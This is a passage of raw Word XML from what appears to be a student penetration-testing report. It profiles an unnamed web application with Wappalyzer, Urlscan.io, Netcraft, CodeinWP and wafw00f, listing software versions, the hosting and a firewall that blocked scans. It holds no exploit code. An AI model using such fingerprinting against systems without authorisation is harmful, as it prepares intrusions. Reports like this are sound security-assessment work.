      <w:r w:rsidR="00995B9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5FED">
        <w:t>client-side scripts</w:t>
      </w:r>
      <w:r w:rsidR="00BC6AD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B0DAE">
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:r w:rsidR="00995B9C">
        <w:t>JavaScript from accessing the Cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06591371" w14:textId="1EE9B192" w:rsidR="00AB355B" w:rsidRDefault="008F6D17" w:rsidP="006674B9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003313A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9A72A4" wp14:editId="58A7B5D4">
            <wp:extent cx="5933173" cy="1272209"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5988605" cy="1284095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77749497" w14:textId="77777777" w:rsidR="00092354" w:rsidRPr="00AB355B" w:rsidRDefault="00092354" w:rsidP="00AB355B"/>
    <w:p w14:paraId="3145DBB5" w14:textId="77777777" w:rsidR="007429A3" w:rsidRDefault="007429A3">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EEE42" w14:textId="0706F732" w:rsidR="0021469B" w:rsidRDefault="00AC04B6" w:rsidP="0021469B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1BBB73" w14:textId="07C36C1C" w:rsidR="002A5102" w:rsidRDefault="002A5102" w:rsidP="002A5102">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ECDE4" w14:textId="0D51FF71" w:rsidR="005B0428" w:rsidRPr="005B0428" w:rsidRDefault="005B0428" w:rsidP="005B0428">
      <w:r>
        <w:t xml:space="preserve">This tool </w:t>
      </w:r>
      <w:r w:rsidR="00405793">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a website technology identifier to discover the technology stack of any website. Based on the scan, it revealed </w:t>
      </w:r>
      <w:r w:rsidR="00F078DD">
        <w:t>the web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be using PHP version 7.4.26, </w:t>
      </w:r>
      <w:r w:rsidR="005A6940">
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version 3.2.1, and is hosted on LiteSpeed web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A70B6" w14:textId="29774AF9" w:rsidR="006674B9" w:rsidRPr="006674B9" w:rsidRDefault="00405793" w:rsidP="006674B9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00405793">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6083FAFC" wp14:editId="61729681">
            <wp:extent cx="5943600" cy="6344285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946368" name="Picture 189463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68" name="Picture 18946368" descr="Graphical user interface, application, Teams&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="6344285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2F25A" w14:textId="77777777" w:rsidR="007429A3" w:rsidRDefault="007429A3">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E36878" w14:textId="600A7E7A" w:rsidR="00AC04B6" w:rsidRDefault="00AC04B6" w:rsidP="0021469B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Urlscan.IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08154FFF" w14:textId="0D1367C0" w:rsidR="000B460D" w:rsidRDefault="00BD4A24" w:rsidP="000B460D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B46B39" w14:textId="646ABC8C" w:rsidR="000B460D" w:rsidRPr="00735D98" w:rsidRDefault="000B460D" w:rsidP="005A6940">
      <w:r>
        <w:t xml:space="preserve">Urlscan.IO </w:t>
      </w:r>
      <w:r w:rsidR="000E34E8">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used to scan the web application to gather information such as its infrastructure and site contents. The detected technologies on the web application were shown to be using CodeIgniter, which is an open-source PHP web framework, and some </w:t>
      </w:r>
      <w:r w:rsidR="00F40FC4">
        <w:t xml:space="preserve">well-known </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript libraries</w:t>
      </w:r>
      <w:r w:rsidR="003D77CA">
        <w:t>, Select2 and jQuery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74ECFD" w14:textId="59D08F3A" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="006674B9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7941">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311394B0" wp14:editId="152860CE">
            <wp:extent cx="4285753" cy="5632084"/>
            <wp:effectExtent l="0" t="0" r="635" b="698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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4392821" cy="5772786"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43718422" w14:textId="77777777" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="000B460D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7434FF7C" w14:textId="49AADB15" w:rsidR="00D1529D" w:rsidRPr="00824371" w:rsidRDefault="00D1529D" w:rsidP="00824371"/>
    <w:p w14:paraId="19551F15" w14:textId="39ECB65B" w:rsidR="006D6CFF" w:rsidRDefault="006D6CFF" w:rsidP="006D6CFF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Netcraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58631CD4" w14:textId="5416E964" w:rsidR="005B0428" w:rsidRDefault="00C6547D" w:rsidP="005B0428">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F0EC45" w14:textId="7D9E472C" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="000B460D">
      <w:r>
        <w:t xml:space="preserve">Netcraft site report was used to discover the infrastructure and technologies used by the web application. Based on the result, the site technologies used </w:t>
      </w:r>
      <w:r w:rsidR="5EF22A7F">
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be PHP and JavaScript. The PHP application was detected to be using CodeIgniter framework and the client-side framework was </w:t>
      </w:r>
      <w:r w:rsidR="00170B05">
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be using jQuery. However, this tool does not reveal the specific version of the technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2C73C" w14:textId="3F022EED" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="006674B9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000823C7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51CF03AD" wp14:editId="4904E3A6">
            <wp:extent cx="5468099" cy="3848432"/>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8"/>
                    <a:srcRect b="46013"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5623554" cy="3957840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="330ECED5" w14:textId="77777777" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="000B460D"/>
    <w:p w14:paraId="1262D2B9" w14:textId="77777777" w:rsidR="007429A3" w:rsidRDefault="007429A3">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FC23F" w14:textId="668EE136" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="000B460D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CodeinWP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DBEE76" w14:textId="77777777" w:rsidR="000B460D" w:rsidRDefault="000B460D" w:rsidP="000B460D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE88F5B" w14:textId="0B61D3E1" w:rsidR="006674B9" w:rsidRDefault="006674B9" w:rsidP="00B1659D">
      <w:r>
        <w:t xml:space="preserve">This tool </w:t>
      </w:r>
      <w:r w:rsidR="008270C7">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used to check the host of the web application on the Internet. It retrieves information such as the name of the web host, IP address of the server, and location of the server.</w:t>
      </w:r>
      <w:r w:rsidR="002D0AE0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F206F">
        <w:t>As seen below,</w:t>
      </w:r>
      <w:r w:rsidR="002E2CA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E6A70">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web application is hosted on the cloud by Web Hosting, which is an online service that allows for publication of website files onto the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F03CF0" w14:textId="035E6A27" w:rsidR="006674B9" w:rsidRPr="001927A7" w:rsidRDefault="006674B9" w:rsidP="006674B9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001927A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="581B1F07" wp14:editId="4335BCC2">
            <wp:extent cx="5171935" cy="3387256"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="34" name="Picture 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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId39"/>
                    <a:srcRect r="5582"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272880" cy="3453368"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E317F2C" w14:textId="77777777" w:rsidR="006674B9" w:rsidRPr="00740B63" w:rsidRDefault="006674B9" w:rsidP="000B460D">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F871AD2" w14:textId="77777777" w:rsidR="007429A3" w:rsidRDefault="007429A3">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A8B47" w14:textId="743AD194" w:rsidR="00DE03B6" w:rsidRDefault="00DE03B6" w:rsidP="002946F0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wafw</w:t>
      </w:r>
      <w:r w:rsidR="00245A3F">
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F95BEA" w14:textId="4B071EAA" w:rsidR="00180B9C" w:rsidRPr="00180B9C" w:rsidRDefault="00180B9C" w:rsidP="00180B9C">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00740B63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691AC151" w14:textId="47CBF342" w:rsidR="00166E97" w:rsidRDefault="00FE68A5" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">Wafw00f is a package that identifies and fingerprints a product for the presence of a </w:t>
      </w:r>
      <w:r w:rsidR="00F04A79">
        <w:t>Web Application Firewall (</w:t>
      </w:r>
      <w:r>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="00F04A79">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009B1F17">
        <w:t>Based on the scan using wafw00f, the web application is reported to be protect</w:t>
      </w:r>
      <w:r w:rsidR="00682378">
        <w:t xml:space="preserve">ed using </w:t>
      </w:r>
      <w:r w:rsidR="00A926FF">
        <w:t xml:space="preserve">LiteSpeed </w:t>
      </w:r>
      <w:r w:rsidR="00682378">
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="00A268AA">
        <w:t xml:space="preserve"> by LiteSpeed Technologies</w:t>
      </w:r>
      <w:r w:rsidR="00682378">
        <w:t>. The usage of a WAF may hinder future scans and pen-testing</w:t>
      </w:r>
      <w:r w:rsidR="00C06884">
        <w:t xml:space="preserve"> due to malicious requests being </w:t>
      </w:r>
      <w:r w:rsidR="009050C2">
        <w:t xml:space="preserve">filtered, monitored, and </w:t>
      </w:r>
      <w:r w:rsidR="00C06884">
        <w:t>blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911B733" w14:textId="1DEF55DB" w:rsidR="00827DB4" w:rsidRDefault="006D0838" w:rsidP="00166E97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658245" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01BD68A9" wp14:editId="4080DB72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1627850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5482262" cy="132402"/>
                <wp:effectExtent l="0" t="0" r="23495" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Rectangle 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5482262" cy="1324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FB21E5">
              <v:rect id="Rectangle 3" style="position:absolute;margin-left:0;margin-top:128.2pt;width:431.65pt;height:10.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FE61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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CA25D0" w:rsidRPr="00EB2C05">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A44096D" wp14:editId="7F90352D">
            <wp:extent cx="5943600" cy="232918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40"/>
                    <a:srcRect t="5179"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2329180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE849D" w14:textId="2DA676B1" w:rsidR="003E3655" w:rsidRDefault="003E3655" w:rsidP="00166E97"/>
    <w:p w14:paraId="1517F7C8" w14:textId="0DBACB95" w:rsidR="003E3655" w:rsidRDefault="003E3655" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">Below is </w:t>
      </w:r>
      <w:r w:rsidR="00497503">
        <w:t xml:space="preserve">a screenshot of the web application when an IP address is blocked. This </w:t>
      </w:r>
      <w:r w:rsidR="003F7542">
        <w:t xml:space="preserve">process occurred frequently during the automated scanning process </w:t>
      </w:r>
      <w:r w:rsidR="00597C48">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006D1D4F">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="003F7542">
        <w:t xml:space="preserve"> be discussed in the later section of th</w:t>
      </w:r>
      <w:r w:rsidR="000F10F0">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="003F7542">
        <w:t>report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F1CF5" w14:textId="2AFF2A69" w:rsidR="003E3655" w:rsidRDefault="003E3655" w:rsidP="00166E97">
      <w:r w:rsidRPr="003E3655">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A0AC3FB" wp14:editId="73D467E8">
            <wp:extent cx="5943600" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="240" name="Picture 24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website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCA1B7" w14:textId="0E5A1341" w:rsidR="003506E3" w:rsidRDefault="003506E3" w:rsidP="00DE03B6"/>
    <w:p w14:paraId="246E0D92" w14:textId="1DCF55B6" w:rsidR="00497503" w:rsidRPr="000F1E24" w:rsidRDefault="00497503" w:rsidP="00DE03B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0820E" w14:textId="33B884BC" w:rsidR="00695D8F" w:rsidRDefault="00695D8F" w:rsidP="008C0588">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web Architecture Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26C025" w14:textId="63BD833B" w:rsidR="008C0588" w:rsidRPr="008C0588" w:rsidRDefault="008C0588" w:rsidP="008C0588">
      <w:r>
        <w:t xml:space="preserve">Based on the information gathered from profiling the web architecture infrastructure and technologies used, the web application appears to be operating </w:t>
      </w:r>
      <w:r w:rsidR="00A912C4">
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00822889">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>-tier architecture. As seen below, the diagram depicts the technologies used on each of the individual tiers.</w:t>
      </w:r>
      <w:r w:rsidRPr="00677A7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32F04E" w14:textId="21403A50" w:rsidR="00287677" w:rsidRDefault="00E34A51" w:rsidP="00027A1A">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3809DFC3" wp14:editId="70971525">
            <wp:extent cx="3784587" cy="2639683"/>
            <wp:effectExtent l="0" t="0" r="6985" b="889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8" name="Picture 18946388"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7482" cy="2662626"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D9008" w14:textId="1FA552C9" w:rsidR="00885DB3" w:rsidRDefault="00885DB3" w:rsidP="00834FBE">
      <w:r>
        <w:t xml:space="preserve">The web server is hosted on Web Hosting </w:t>
      </w:r>
      <w:r w:rsidR="00670A4F">
        <w:t>using LiteSpeed as its web server.</w:t>
      </w:r>
      <w:r w:rsidR="004F4C76">
        <w:t xml:space="preserve"> The web application was built using CodeIgniter PHP framework along with JavaScript and other libraries such as Select2 and </w:t>
      </w:r>
      <w:r w:rsidR="00000350">
        <w:t>jQuery</w:t>
      </w:r>
      <w:r w:rsidR="009B5695">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C2516A">
        <w:t>The web application interacts with a database</w:t>
      </w:r>
      <w:r w:rsidR="008F70BB">
        <w:t xml:space="preserve"> which was revealed to be using MariaDB. Th</w:t>
      </w:r>
      <w:r w:rsidR="00841515">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00FA3F33">
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00841515">
        <w:t xml:space="preserve">version was </w:t>
      </w:r>
      <w:r w:rsidR="00FA3F33">
        <w:t>disclosed</w:t>
      </w:r>
      <w:r w:rsidR="00841515">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002715AD">
        <w:t xml:space="preserve">during </w:t>
      </w:r>
      <w:r w:rsidR="007C5BBB">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="002715AD">
        <w:t>vulnerability scanning phase.</w:t>
      </w:r>
      <w:r w:rsidR="001678E8">
        <w:t xml:space="preserve"> Regarding the User Interface, frameworks such as </w:t>
      </w:r>
      <w:r w:rsidR="00DC1FF5">
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r w:rsidR="001678E8">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A40308">
        <w:t>animate.css w</w:t>
      </w:r>
      <w:r w:rsidR="00DC1FF5">
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidR="00A40308">
        <w:t xml:space="preserve"> used.</w:t>
      </w:r>
    </w:p>
